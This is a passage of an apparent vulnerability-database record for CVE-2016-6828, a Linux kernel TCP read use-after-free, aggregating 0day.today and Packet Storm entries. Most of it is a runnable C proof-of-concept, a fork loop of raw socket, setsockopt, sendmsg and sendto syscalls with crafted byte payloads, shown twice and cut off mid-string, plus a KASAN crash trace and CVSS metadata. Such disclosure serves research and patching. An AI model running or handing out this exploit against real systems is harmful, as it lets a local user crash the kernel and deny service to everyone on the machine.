x15\\x38\\x2a\\x52\\xf0\\xdd\\x58\\x3d\\xa4\\x7f\\x5b\\xb9\\xa3\\x9c\\x90\\x14\\xf9\\x2c\\x2b\\xaa\\x1e\\x0d\\xfd\\xf6\\x93\\x7e\\xbc\\xc3\\x59\\x11\\x6e\\xd9\\x52\\x1e\\xd0\\xea\\x0b\\x55\\x0b\\x71\\xfa\\x69\\xda\\x9d\\x35\\x10\\x70\\x32\\x68\\xe8\\xde\\x47\\x74\\x1f\\xc6\\x60\\x86\\xbd\\x15\\x1c\\x6b\\x52\\xeb\\xe4\\x04\\x0f\\x8c\\x70\\x2f\\x8d\\x6d\\x7e\\x5f\\xfd\\xe7\\xd1\\x87\\x80\\x76\\xd8\\x7a\\x2c\\xbf\\xb2\\x98\\x12\\x83\\x81\\x94\\x11\\x7d\\x1c\\x90\\xfd\\xf0\\xdc\\xe6\\x9d\\xee\\x76\\xde\\x50\\xcb\\x97\\x25\\xca\\x88\\xd8\\x70\\x97\\x40\\x25\\x94\\xc5\\xfe\\x8b\\x44\\x05\\x8d\\x6e\\x7f\\xab\\xc3\\x27\\xd8\\x0e\\x4a\\x30\\xb5\\xfb\\x95\\xf8\\x34\\x75\\x01\\x1f\\xe6\\xac\\x81\\x1b\\x13\\x63\\xb7\\x60\\xb8\\x1c\\x3b\\xda\\x07\\x26\\x9e\\xfd\\xeb\\x7f\\x43\\x46\\x93\\x75\\x63\\xdc\\xa7\\xe9\\xc1\\x8f\\xa9\\x06\\x96\\xe7\\x10\\x87\\xb4\\x32\\x4a\\x30\\x69\\xd2\\xf4\\x2b\\x5d\\x76\\xa3\\x94\\x6b\\x72\\xd9\\xc6\\xfa\\x6a\\x49\\x12\\xc7\\xc2\\x74\\x3f\\xc4\\x39\\x9f\\xa0\\x7e\\xcd\\x81\\x9c\\x54\\x0f\\x14\\xce\\xd3\\x7e\\xd8\\xe8\\xd2\\xc2\\x24\\x2e\\xc5\\x1b\\x58\\xf8\\x8e\\xe6\\xaa\\x16\\x69\\x6c\\x4b\\x40\\x86\\x1a\\x1a\\xad\\x11\\x6f\\x90\\x48\\x68\\x93\\xb1\\x8f\\xbd\\xaf\\x8d\\x00\\x09\\x5e\\xf4\\xe3\\x03\\x59\\xff\\x8f\\xf5\\xf0\\xe2\\xa1\\x79\\x93\\xf5\\x76\\xcb\\x56\\x93\\xb8\\xe6\\x22\\xe5\\x69\\x90\\x3d\\x0f\\x9b\\x57\\x86\\x19\\xf7\\x63\\xd5\\x2c\\xfe\\xad\\x63\\x60\\x9e\\x9e\\x29\\x04\\xe9\\x4d\\xb6\\xd9\\xb1\\xdb\\x42\\x2d\\x8b\\x8d\\x6d\\xdd\\xae\\x0b\\xca\\x58\\x38\\xf4\\x30\\xad\\xae\\xa3\\x3d\\x64\\x47\\xe0\\x77\\xc3\\xed\\xc8\\xe0\\x7d\\x3c\\x6c\\xda\\xbd\\x47\\x5e\\x37\\xb4\\xe4\\xb8\\x1c\\x69\\x16\\xb6\\xd5\\x8b\\x9a\\x15\\xfa\\x6b\\x21\\x88\\x74\\xbb\\xdf\\xe3\\xbe\\x31\\x02\\x8e\\x82\\x81\\x10\\x98\\x24\\x74\\x04\\xad\\xe3\\xc5\\x63\\x57\\x0d\\x58\\xbe\\x1c\\x97\\xa1\\x0d\\xb6\\x55\\x83\\x18\\x41\\x37\\xa7\\x1b\\x51\\x37\\x13\\x99\\xeb\\x6f\\xe3\\x70\\xc2\\x4a\\x8c\\x17\\xc6\\x30\\x8d\\x01\\xfe\\xd4\\x71\\x4c\\xee\\x82\\x94\\xe4\\x1d\\x9a\\x8a\\xed\\x48\\x61\\xba\\x6c\\x63\\x5f\\x3b\\x13\\x9f\\x5b\\xe4\\x0b\\x2c\\x44\\x1c\\xb7\\xf6\\xc7\\x64\\xf6\\x74\\x4a\\x16\\x7a\\x35\\xf7\\x2e\\x9d\\x4f\\x00\\x38\\xa7\\xad\\xe7\\x17\\x0c\\xb7\\x3f\\x02\\x41\\xe9\\xa3\\x37\\x5b\\x98\\xd5\\x0f\\xc6\\xe6\\xd1\\x38\\x4e\\x87\\x4f\\x2f\\x02\\xa1\\x27\\x4d\\xb2\\x03\\xfc\\x50\\x48\\xaa\\x33\\x92\\xe1\\x10\\xa6\\x0b\\xb0\\x20\\x7c\\x57\\xd4\\x85\\x55\\x51\\x6e\\x7e\\xdf\\xa2\\x46\\xf5\\x94\\x93\\x03\\x02\\xdb\\x94\\x55\\x23\\xd9\\x5b\\x99\\x2b\\x3a\\x7e\\x7d\\xb1\\x80\\x47\\xf9\\x77\\xee\\x0f\\x5e\\x63\\x7f\\x1e\\x96\\xdf\\xf9\\x1c\\x81\\x55\\xdd\\x02\\x81\\x87\\xc8\\x04\\x52\\x59\\x49\\xd4\\x08\\xd5\\x73\\x43\\x3f\\xd2\\xf9\\xa9\\xf0\\xd7\\xb9\\x97\\x86\\x9c\\x0a\\xc6\\x7d\\x5a\\x98\\x88\\x2b\\x0b\\x38\\xa1\\xcb\\xf8\\x71\\xc7\\x5d\\xfe\\xba\\xd0\\x26\\x4b\\xdf\\xb8\\x11\\x8f\\x71\\x60\\x68\\xc7\\x82\\xd0\\x36\\x97\\x23\\x56\\xda\\x52\\x58\\x90\\x0a\\x42\\x0b\\xfc\\xf8\\xc9\\x1f\\x36\\x7f\\x9f\\xe5\\x5b\\xf8\\x6e\\xe1\\x78\\x47\\xfe\\x6b\\x00\\xcd\\xe5\\x6b\\xe2\\xa6\\xaf\\x2b\\x33\\x95\\x73\\x79\\x52\\x13\\x1c\\x87\\x3d\\x8d\\xbc\\x32\\x1e\\x11\\x25\\x91\\x51\\xa0\\xaf\\xcc\\xf1\\xc3\\x5a\\xea\\x8b\\x15\\x82\\x76\\xa9\\x0f\\xe7\\x08\\x73\\x53\\x02\\x4c\\x8c\\xb2\\x8d\\x4b\\xa0\\xed\\x37\\x20\\x7f\\x54\\xa2\\x2a\\x33\\x6b\\x5f\\x3a\\x4f\\x54\\x61\\x85\\x91\\x86\\x68\\x5a\\xd4\\x80\\xc9\\x21\\xa9\\x16\\x5d\\x77\\xee\\x28\\xeb\\xc2\\x5c\\x22\\xe4\\x27\\xdb\\x5b\\xe4\\xa7\\x70\\xdc\\x6a\\x8e\\xd9\\xe7\\x77\\x09\\x5b\\x94\\x97\\xc6\\xf4\\x1f\\x7a\\x35\\x9e\\x26\\x1e\\x8b\\x37\\xe3\\xa4\\xdc\\x0a\\x8a\\x19\\x59\\x3a\\x77\\x81\\x2d\\x9b\\x0e\\x51\\x2b\\xd7\\xc5\\xbc\\x07\\xfa\\xf3\\x29\\x79\\x35\\x98\\xe3\\xb8\\xf7\\xe5\\x40\\xdf\\xa8\\x93\\x00\\xf6\\x53\\x8c\\xcc\\x33\\xdf\\x0e\\x35\\x3e\\x72\\x8d\\x48\\x85\\x05\\x40\\x43\\xe1\\x13\\xd6\\x4a\\x95\\x50\\xf8\\x32\\xca\\xc3\\x1c\\x28\\xd4\\x41\\x15\\x64\\xc1\\x08\\xfb\\x2c\\xc2\\x1f\\x79\\x30\\x58\\xaa\\x7c\\x0d\\x83\\x8e\\x87\\xf4\\x2e\\xa3\\xfc\\xeb\\xd0\\xdb\\xcc\\x15\\xcd\\x88\\x99\\x41\\x75\\x13\\xc1\\x0c\\x53\\x96\\xfe\\xff\\xeb\\x87\\x6a\\x04\\x75\\xf2\\x98\\x40\\x7e\\xc7\\x4e\\x47\\x63\\x31\\x2f\\xb2\\xa2\\x88\\x30\\xca\\x49\\xfb\\x57\\x40\\x65\\x8c\\xc9\\x80\\x20\\xb9\\xc9\\xfc\\x79\\x12\\x8d\\xe6\\x24\\x24\\x5f\\x38\\x47\\x3c\\x93\\x64\\x41\\x9a\\xf2\\xe8\\xab\\xc1\\xaf\\x13\\x95\\x5c\\x26\\x4e\\x02\\x99\\x5f\\x6a\\xe3\\xd4\\x91\\x0a\\xf5\\x06\\x3a\\x2d\\xc9\\x22\\x96\\x6b\\xa0\\x77\\x00\\x77\\x7c\\x26\\xdc\\xb6\\xc1\\x1b\\x6c\\xc8\\xfe\\x43\\x2c\\xe2\\xdc\\x58\\x7e\\x30\\x38\\x98\\x97\\xdf\\xda\\xae\\x9d\\x40\\x94\\xb7\\x16\\x91\\x66\\x94\\x6c\\x2a\\x50\\x39\\x69\\xce\\xb4\\x5c\\xec\\x2e\\x60\\x71\\x92\\xa3\\x14\\x1f\\x08\\x70\\xcb\\x9c\\x47\\x5b\\xf3\\xf4\\xea\\x7a\\x34\\x43\\x32\\x8b\\x19\\x57\\xd2\\xe7\\x1c\\xc5\\xeb\\xa5\\x66\\x37\\x73\\x80\\x59\\xac\\x1e\\xc0\\x2f\\xf1\\x30\\xf4\\xd0\\xc7\\x78\\x2b\\x38\\xd3\\xab\\x74\\xfd\\x4d\\xdf\\x5e\\xc5\\xa7\\x89\\x1b\\xb7\\x76\\xf5\\xf9\\xfd\\xca\\xfc\\xc2\\x0d\", 4096);\r\n r[53] = syscall(SYS_sendto, r[10], 0x20015285ul, 0x1000ul, 0xc080ul, 0x0ul, 0x0ul);\r\n r[54] = syscall(SYS_mmap, 0x20022000ul, 0x1000ul, 0x3ul, 0x32ul, 0xfffffffffffffffful, 0x0ul);\r\n *(uint32_t*)0x20022fdd = (uint32_t)0x28;\r\n *(uint32_t*)0x20022fe1 = (uint32_t)0x400;\r\n *(uint64_t*)0x20022fe5 = (uint64_t)0x0;\r\n *(uint64_t*)0x20022fed = (uint64_t)0x8ab;\r\n *(uint64_t*)0x20022ff5 = (uint64_t)0xfffffffffffffffb;\r\n *(uint16_t*)0x20022ffd = (uint16_t)0x5;\r\n r[61] = syscall(SYS_write, r[10], 0x20022fddul, 0x28ul, 0, 0, 0);\r\n } else if (pid > 0) {\r\n int returnStatus;\r\n waitpid(pid, &returnStatus, 0);\r\n printf(\"collected child\\n\");\r\n } else {\r\n printf(\"fork failed\\n\");\r\n exit(1);\r\n }\r\n }\r\n return 0;\r\n}\r\n \r\n \r\n// KASAN report on v4.8-rc1, equivalent on master\r\n \r\n/*\r\n[ 21.446876] BUG: KASAN: use-after-free in tcp_xmit_retransmit_queue+0xc75/0xdb0 at addr ffff88007a06d428\r\n[ 21.447953] Read of size 4 by task rsyslogd/1612\r\n[ 21.448465] CPU: 0 PID: 1612 Comm: rsyslogd Tainted: G B 4.8.0-rc1 #1\r\n[ 21.449263] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Ubuntu-1.8.2-1ubuntu1 04/01/2014\r\n[ 21.450270] 0000000000000000 0000000015e55fbd ffff88007dc07268 ffffffff81bef151\r\n[ 21.451135] ffff88011cfb0d80 ffff88007a06d400 ffff88007a06d5a8 ffff88007a06d400\r\n[ 21.452002] ffff88007dc07290 ffffffff815d0351 ffff88007dc07328 ffff88007a06d400\r\n[ 21.452873] Call Trace:\r\n[ 21.453142] <IRQ> [<ffffffff81bef151>] dump_stack+0x83/0xb2\r\n[ 21.453835] [<ffffffff815d0351>] kasan_object_err+0x21/0x70\r\n[ 21.454450] [<ffffffff815d05f4>] kasan_report_error+0x204/0x500\r\n[ 21.455135] [<ffffffff815d0a31>] __asan_report_load4_noabort+0x61/0x70\r\n[ 21.455899] [<ffffffff82a90f55>] ? tcp_xmit_retransmit_queue+0xc75/0xdb0\r\n[ 21.456624] [<ffffffff82a90f55>] tcp_xmit_retransmit_queue+0xc75/0xdb0\r\n[ 21.457329] [<ffffffff82a53aba>] tcp_xmit_recovery.part.54+0x2a/0x120\r\n[ 21.458028] [<ffffffff82a69c96>] tcp_ack+0x2716/0x4ed0\r\n[ 21.458590] [<ffffffff815cf6e6>] ? save_stack+0x46/0xd0\r\n[ 21.459189] [<ffffffff815cf95d>] ? kasan_kmalloc+0xad/0xe0\r\n[ 21.459804] [<ffffffff82a67580>] ? tcp_fastretrans_alert+0x2dc0/0x2dc0\r\n[ 21.460540] [<ffffffff82a5a63f>] ? tcp_parse_options+0x18f/0xb20\r\n[ 21.461237] [<ffffffff811ea161>] ? ttwu_do_wakeup+0x21/0x2d0\r\n[ 21.461865] [<ffffffff82a6e8b1>] ? tcp_validate_incoming+0x821/0x1210\r\n[ 21.462581] [<ffffffff81c0e93e>] ? put_dec+0x2e/0xc0\r\n[ 21.463167] [<ffffffff82a74201>] tcp_rcv_established+0x5b1/0x20c0\r\n[ 21.463884] [<ffffffff815cfaa5>] ? memcpy+0x45/0x50\r\n[ 21.464414] [<ffffffff828ec80a>] ? __copy_skb_header+0x19a/0x1f0\r\n[ 21.465057] [<ffffffff82a73c50>] ? tcp_data_queue+0x4240/0x4240\r\n[ 21.465719] [<ffffffff828eca97>] ? __skb_clone+0x237/0x7a0\r\n[ 21.466326] [<ffffffff815cbed8>] ? kmem_cache_alloc+0xb8/0x1b0\r\n[ 21.466954] [<ffffffff82baa6b7>] ? rt6_check_expired+0xa7/0x120\r\n[ 21.467591] [<ffffffff82bae7f2>] ? ip6_dst_check+0x262/0x410\r\n[ 21.468231] [<ffffffff82c0ff52>] tcp_v6_do_rcv+0x642/0x13c0\r\n[ 21.468836] [<ffffffff82c148d2>] tcp_v6_rcv+0x1a32/0x2550\r\n[ 21.469462] [<ffffffff81233abb>] ? trigger_load_balance+0x3fb/0x8b0\r\n[ 21.470179] [<ffffffff82beaa55>] ? raw6_local_deliver+0x555/0x6f0\r\n[ 21.470953] [<ffffffff82b82dec>] ip6_input_finish+0x2ac/0xd50\r\n[ 21.471600] [<ffffffff82b8396a>] ip6_input+0xda/0x1f0\r\n[ 21.472149] [<ffffffff81117670>] ? kvm_guest_apic_eoi_write+0x70/0x90\r\n[ 21.472870] [<ffffffff82b83890>] ? ip6_input_finish+0xd50/0xd50\r\n[ 21.473521] [<ffffffff8128a722>] ? handle_fasteoi_irq+0x362/0x6a0\r\n[ 21.474210] [<ffffffff810f56c0>] ? ioapic_ir_ack_level+0xd0/0xd0\r\n[ 21.474858] [<ffffffff82b8291e>] ip6_rcv_finish+0x11e/0x340\r\n[ 21.475487] [<ffffffff82b84806>] ipv6_rcv+0xd86/0x1750\r\n[ 21.476043] [<ffffffff82b83a80>] ? ip6_input+0x1f0/0x1f0\r\n[ 21.476615] [<ffffffff82cadeb5>] ? _raw_spin_unlock_irqrestore+0x15/0x20\r\n[ 21.477332] [<ffffffff815d03d7>] ? kasan_end_report+0x37/0x50\r\n[ 21.478956] [<ffffffff815d0825>] ? kasan_report_error+0x435/0x500\r\n[ 21.479618] [<ffffffff82b83a80>] ? ip6_input+0x1f0/0x1f0\r\n[ 21.480250] [<ffffffff8293926f>] __netif_receive_skb_core+0x15df/0x26c0\r\n[ 21.481017] [<ffffffff812092c0>] ? update_curr+0x150/0x4e0\r\n[ 21.481700] [<ffffffff82937c90>] ? netdev_info+0x120/0x120\r\n[ 21.482339] [<ffffffff812bf12b>] ? hrtimer_active+0x1db/0x280\r\n[ 21.482969] [<ffffffff81206b3d>] ? cpu_load_update+0x1bd/0x350\r\n[ 21.483619] [<ffffffff81227f2c>] ? task_tick_fair+0x119c/0x2420\r\n[ 21.484295] [<ffffffff810fddf1>] ? __x2apic_send_IPI_dest.constprop.4+0x31/0x40\r\n[ 21.485101] [<ffffffff810fe072>] ? x2apic_send_IPI+0x72/0xa0\r\n[ 21.485739] [<ffffffff8293a37f>] __netif_receive_skb+0x2f/0x170\r\n[ 21.486383] [<ffffffff8293e1a7>] process_backlog+0x197/0x580\r\n[ 21.487021] [<ffffffff8293bc9a>] net_rx_action+0x6ca/0xbb0\r\n[ 21.487615] [<ffffffff8293b5d0>] ? sk_busy_loop+0x7b0/0x7b0\r\n[ 21.488258] [<ffffffff8111850e>] ? kvm_clock_get_cycles+0x1e/0x20\r\n[ 21.488909] [<ffffffff812d3e90>] ? ktime_get+0xb0/0x110\r\n[ 21.489471] [<ffffffff810fdc1b>] ? native_apic_msr_write+0x2b/0x30\r\n[ 21.490147] [<ffffffff812e3ca6>] ? clockevents_program_event+0x246/0x340\r\n[ 21.490868] [<ffffffff82cb121e>] __do_softirq+0x1ce/0x57d\r\n[ 21.491470] [<ffffffff811769d7>] irq_exit+0x117/0x140\r\n[ 21.492035] [<ffffffff82cb0dd0>] smp_apic_timer_interrupt+0x80/0xa0\r\n[ 21.492712] [<ffffffff82caf062>] apic_timer_interrupt+0x82/0x90\r\n[ 21.493378] <EOI> Object at ffff88007a06d400, in cache skbuff_fclone_cache size: 424\r\n[ 21.494277] Allocated:\r\n[ 21.494538] PID = 1711\r\n[ 21.494801] [<ffffffff810b308b>] save_stack_trace+0x2b/0x50\r\n[ 21.495416] [<ffffffff815cf6e6>] save_stack+0x46/0xd0\r\n[ 21.495970] [<ffffffff815cf95d>] kasan_kmalloc+0xad/0xe0\r\n[ 21.496572] [<ffffffff815cfe92>] kasan_slab_alloc+0x12/0x20\r\n[ 21.497185] [<ffffffff815cc51e>] kmem_cache_alloc_node+0xfe/0x1d0\r\n[ 21.497853] [<ffffffff828f21f2>] __alloc_skb+0xd2/0x5d0\r\n[ 21.498475] [<ffffffff82a480fd>] sk_stream_alloc_skb+0xbd/0x790\r\n[ 21.499129] [<ffffffff82a4b464>] tcp_sendmsg+0x13f4/0x2d10\r\n[ 21.499754] [<ffffffff82afb2ac>] inet_sendmsg+0x24c/0x350\r\n[ 21.500371] [<ffffffff828d58ef>] sock_sendmsg+0xcf/0x110\r\n[ 21.500988] [<ffffffff828d5b52>] sock_write_iter+0x222/0x3c0\r\n[ 21.501625] [<ffffffff8162d10b>] __vfs_write+0x3cb/0x640\r\n[ 21.502249] [<ffffffff8162e315>] vfs_write+0x175/0x4a0\r\n[ 21.502838] [<ffffffff81631b78>] SyS_write+0xd8/0x1b0\r\n[ 21.503429] [<ffffffff82cae476>] entry_SYSCALL_64_fastpath+0x1e/0xa8\r\n[ 21.504144] Freed:\r\n[ 21.504368] PID = 1711\r\n[ 21.504628] [<ffffffff810b308b>] save_stack_trace+0x2b/0x50\r\n[ 21.505290] [<ffffffff815cf6e6>] save_stack+0x46/0xd0\r\n[ 21.505879] [<ffffffff815cff13>] kasan_slab_free+0x73/0xc0\r\n[ 21.506501] [<ffffffff815cb70c>] kmem_cache_free+0x7c/0x210\r\n[ 21.507128] [<ffffffff828eba3b>] kfree_skbmem+0x7b/0xf0\r\n[ 21.507752] [<ffffffff828f3e22>] __kfree_skb+0x22/0x30\r\n[ 21.508339] [<ffffffff82a4b8ad>] tcp_sendmsg+0x183d/0x2d10\r\n[ 21.508962] [<ffffffff82afb2ac>] inet_sendmsg+0x24c/0x350\r\n[ 21.509574] [<ffffffff828d58ef>] sock_sendmsg+0xcf/0x110\r\n[ 21.510194] [<ffffffff828d5b52>] sock_write_iter+0x222/0x3c0\r\n[ 21.510818] [<ffffffff8162d10b>] __vfs_write+0x3cb/0x640\r\n[ 21.511408] [<ffffffff8162e315>] vfs_write+0x175/0x4a0\r\n[ 21.512003] [<ffffffff81631b78>] SyS_write+0xd8/0x1b0\r\n[ 21.512562] [<ffffffff82cae476>] entry_SYSCALL_64_fastpath+0x1e/0xa8\r\n[ 21.513258] Memory state around the buggy address:\r\n[ 21.513770] ffff88007a06d300: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n[ 21.514546] ffff88007a06d380: 00 00 00 00 00 fc fc fc fc fc fc fc fc fc fc fc\r\n[ 21.515310] >ffff88007a06d400: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb\r\n[ 21.516114] ^\r\n[ 21.516611] ffff88007a06d480: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb\r\n[ 21.517400] ffff88007a06d500: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb\r\n[ 21.518203] ==================================================================\r\n*/\n\n# 0day.today [2018-04-04] #", "cvss": {"score": 4.9, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/26265"}], "packetstorm": [{"lastseen": "2016-12-05T22:20:26", "references": [], "edition": 1, "description": "", "reporter": "Marco Grassi", "published": "2016-11-09T00:00:00", "title": "Linux Kernel TCP Related Read Use-After-Free", "type": "packetstorm", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2016-6828"], "modified": "2016-11-09T00:00:00", "href": "https://packetstormsecurity.com/files/139642/Linux-Kernel-TCP-Related-Read-Use-After-Free.html", "id": "PACKETSTORM:139642", "sourceData": "`// Source: https://marcograss.github.io/security/linux/2016/08/18/cve-2016-6828-linux-kernel-tcp-uaf.html \n \n// to build clang derp4.c -o derp4 -static \n \n#include <unistd.h> \n#include <sys/syscall.h> \n#include <string.h> \n#include <stdint.h> \n#include <pthread.h> \n#include <stdio.h> \n \n#ifndef SYS_mmap \n#define SYS_mmap 9 \n#endif \n#ifndef SYS_socket \n#define SYS_socket 41 \n#endif \n#ifndef SYS_bind \n#define SYS_bind 49 \n#endif \n#ifndef SYS_sendto \n#define SYS_sendto 44 \n#endif \n#ifndef SYS_setsockopt \n#define SYS_setsockopt 54 \n#endif \n#ifndef SYS_dup \n#define SYS_dup 32 \n#endif \n#ifndef SYS_sendmsg \n#define SYS_sendmsg 46 \n#endif \n#ifndef SYS_recvfrom \n#define SYS_recvfrom 45 \n#endif \n#ifndef SYS_write \n#define SYS_write 1 \n#endif \n \nlong r[62]; \n \n \nint main(int argc, char **argv) \n{ \nwhile (1) { \npid_t pid = fork(); \n \nif (pid == 0) { \nr[0] = syscall(SYS_mmap, 0x20000000ul, 0x20000ul, 0x3ul, 0x32ul, 0xfffffffffffffffful, 0x0ul); \nr[1] = syscall(SYS_socket, 0xaul, 0x1ul, 0x0ul, 0, 0, 0); \nmemcpy((void*)0x20006000, \"\\x0a\\x00\\xab\\x12\\xc7\\x17\\x1c\\x83\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x05\\x4f\\xdc\\xc0\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\", 128); \nr[3] = syscall(SYS_bind, r[1], 0x20006000ul, 0x80ul, 0, 0, 0); \nr[4] = syscall(SYS_mmap, 0x20020000ul, 0x1000ul, 0x3ul, 0x32ul, 0xfffffffffffffffful, 0x0ul); \nmemcpy((void*)0x20012f5a, \"\\x25\\xf9\\x1b\\xd4\\xeb\\xf5\\x39\\x3c\\xd5\\x80\\xf6\\xf0\\xd6\\xe1\\xff\\x65\\x30\\x97\\xac\\xaf\\x1b\\xbc\\xc8\\xae\\xa4\\x1e\\xab\\xd8\\x60\\x51\\xcb\\x4b\\xed\\xae\\xaa\\x37\\xda\\x80\\xf9\\x06\\xb8\\x6b\\xdf\\x78\\x0f\\xd0\\x87\\xf2\\x65\\x5f\\x5e\\x85\\xb5\\x4d\\x6b\\x48\\xff\\xf3\\x0d\\x46\\x1c\\xe5\\xa4\\x48\\x38\\x78\\x18\\x71\\x9b\\x75\\xc4\\xc9\\x77\\xf2\\xc4\\x5f\\x88\\x8e\\xd2\\x8d\\x97\\x26\\x56\\x4c\\x93\\x31\\xbc\\x64\\x22\\xff\\xdc\\x68\\x01\\x74\\x43\\xea\\x84\\x6f\\x1d\\x90\\xeb\\x98\\x6c\\xe9\\x1c\\x3b\\x72\\xab\\xa0\\xb5\\x5b\\xe8\\xee\\xfb\\xf3\\x2d\\x96\\xa0\\xd4\\x13\\x55\\xbc\\xd4\\xe0\\x41\\xfd\\x78\\x7e\\x90\\xf9\\x9f\\x9c\\x57\\x32\\x47\\xf2\\xcf\\x7f\\x4a\\x7b\\x79\\x0a\\xdd\\xb4\\xce\\xbd\\x0b\\x44\\x02\\x95\\x0f\\xaf\\x50\\xff\\x87\\x90\\x09\\xaa\\x94\\x01\\x41\\x43\\x08\\x8e\\xb1\", 165); \nmemcpy((void*)0x20020000, \"\\x0a\\x00\\xab\\x12\\x0d\\xf5\\xba\\x69\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\xac\\xad\\xce\\xa0\", 28); \nr[7] = syscall(SYS_sendto, r[1], 0x20012f5aul, 0xa5ul, 0x249e4e54fe149d8cul, 0x20020000ul, 0x1cul); \n*(uint32_t*)0x20001fff = (uint32_t)0x2; \nr[9] = syscall(SYS_setsockopt, r[1], 0x1ul, 0x8ul, 0x20001ffful, 0x4ul, 0); \nr[10] = syscall(SYS_dup, r[1], 0, 0, 0, 0, 0); \n*(uint32_t*)0x20018000 = (uint32_t)0x4; \nr[12] = syscall(SYS_setsockopt, r[1], 0x29ul, 0xbul, 0x20018000ul, 0x4ul, 0); \n*(uint64_t*)0x2000dfc8 = (uint64_t)0x2000e000; \n*(uint32_t*)0x2000dfd0 = (uint32_t)0xc; \n*(uint64_t*)0x2000dfd8 = (uint64_t)0x20000000; \n*(uint64_t*)0x2000dfe0 = (uint64_t)0x1; \n*(uint64_t*)0x2000dfe8 = (uint64_t)0x0; \n*(uint64_t*)0x2000dff0 = (uint64_t)0x0; \n*(uint32_t*)0x2000dff8 = (uint32_t)0x4; \n*(uint16_t*)0x2000e000 = (uint16_t)0x0; \n*(uint16_t*)0x2000e002 = (uint16_t)0x0; \n*(uint32_t*)0x2000e004 = (uint32_t)0xffff; \n*(uint32_t*)0x2000e008 = (uint32_t)0x401; \n*(uint64_t*)0x20000000 = (uint64_t)0x2000ed3a; \n*(uint64_t*)0x20000008 = (uint64_t)0x37; \n*(uint32_t*)0x2000ed3a = (uint32_t)0x14; \n*(uint16_t*)0x2000ed3e = (uint16_t)0x2; \n*(uint16_t*)0x2000ed40 = (uint16_t)0x12; \n*(uint32_t*)0x2000ed42 = (uint32_t)0x1f; \n*(uint32_t*)0x2000ed46 = (uint32_t)0x7; \n*(uint8_t*)0x2000ed4a = (uint8_t)0x6; \n*(uint8_t*)0x2000ed4b = (uint8_t)0x100; \n*(uint8_t*)0x2000ed4c = (uint8_t)0x3f; \n*(uint32_t*)0x2000ed4d = (uint32_t)0x11; \n*(uint16_t*)0x2000ed51 = (uint16_t)0x0; \n*(uint16_t*)0x2000ed53 = (uint16_t)0x808; \n*(uint32_t*)0x2000ed55 = (uint32_t)0x1; \n*(uint32_t*)0x2000ed59 = (uint32_t)0x0; \n*(uint8_t*)0x2000ed5d = (uint8_t)0x0; \n*(uint32_t*)0x2000ed5e = (uint32_t)0x12; \n*(uint16_t*)0x2000ed62 = (uint16_t)0x2ea; \n*(uint16_t*)0x2000ed64 = (uint16_t)0x200; \n*(uint32_t*)0x2000ed66 = (uint32_t)0x5; \n*(uint32_t*)0x2000ed6a = (uint32_t)0xffffffffffffffff; \n*(uint8_t*)0x2000ed6e = (uint8_t)0x9; \n*(uint8_t*)0x2000ed6f = (uint8_t)0x1; \nr[47] = syscall(SYS_sendmsg, r[10], 0x2000dfc8ul, 0x801ul, 0, 0, 0); \n*(uint16_t*)0x20001003 = (uint16_t)0x1; \n*(uint8_t*)0x20001005 = (uint8_t)0x0; \n*(uint32_t*)0x20001007 = (uint32_t)0x9; \nr[51] = syscall(SYS_recvfrom, r[10], 0x20014a91ul, 0xdeul, 0x0ul, 0x20000ffbul, 0x8ul); \nmemcpy((void*)0x20015285, \"\\xed\\xe0\\xf1\\x03\\xbd\\x1d\\xe2\\x8d\\x13\\x62\\xc9\\x11\\xde\\x3b\\x55\\xb1\\xb2\\x26\\x95\\xb2\\x3f\\x32\\x96\\x8a\\x3d\\xf7\\xd4\\x2c\\xd9\\x32\\xae\\x05\\x9a\\x60\\x09\\xbc\\x49\\x63\\x6a\\x45\\xd5\\x6f\\xa8\\x4b\\xaf\\x8a\\x66\\xf3\\x35\\xad\\xe6\\x68\\x85\\xd4\\x7e\\xe5\\x7c\\x7e\\x06\\xbf\\x32\\xfb\\xf9\\xd2\\x9f\\x40\\xa3\\x0a\\xa0\\x93\\x09\\x73\\x39\\x7d\\xac\\x3c\\x8d\\x83\\xe0\\x0c\\x5e\\xa2\\x36\\x9b\\x9c\\xb4\\x62\\xe8\\x39\\x07\\xd8\\x71\\xc1\\x2f\\x6f\\x18\\xfa\\x8a\\x5d\\x06\\xb4\\x46\\xa2\\x97\\x79\\x81\\xb2\\x85\\xd4\\x4f\\x6b\\x48\\xc4\\xf5\\xdd\\xa8\\x8d\\x10\\x74\\x01\\xe1\\x58\\xb2\\x82\\x72\\xc4\\xb6\\xb2\\xf7\\xaa\\x90\\x9c\\x9f\\x61\\x95\\x87\\x7b\\x99\\xc5\\xa5\\x53\\xbc\\xab\\xdb\\xdb\\x5e\\x32\\xb8\\xc3\\xee\\xd3\\xda\\x7a\\xf2\\x5c\\xc5\\x1a\\xf1\\xd6\\x1b\\x53\\xad\\x24\\xd0\\xa0\\xc0\\x0d\\x73\\x9e\\x81\\x7e\\x4e\\x82\\xf5\\xa9\\x73\\x3c\\x7a\\x5c\\x6e\\x4c\\x48\\x7d\\x42\\xf5\\x2f\\x68\\xf9\\x7e\\xa9\\xd8\\x6a\\x64\\x78\\x08\\x7a\\x3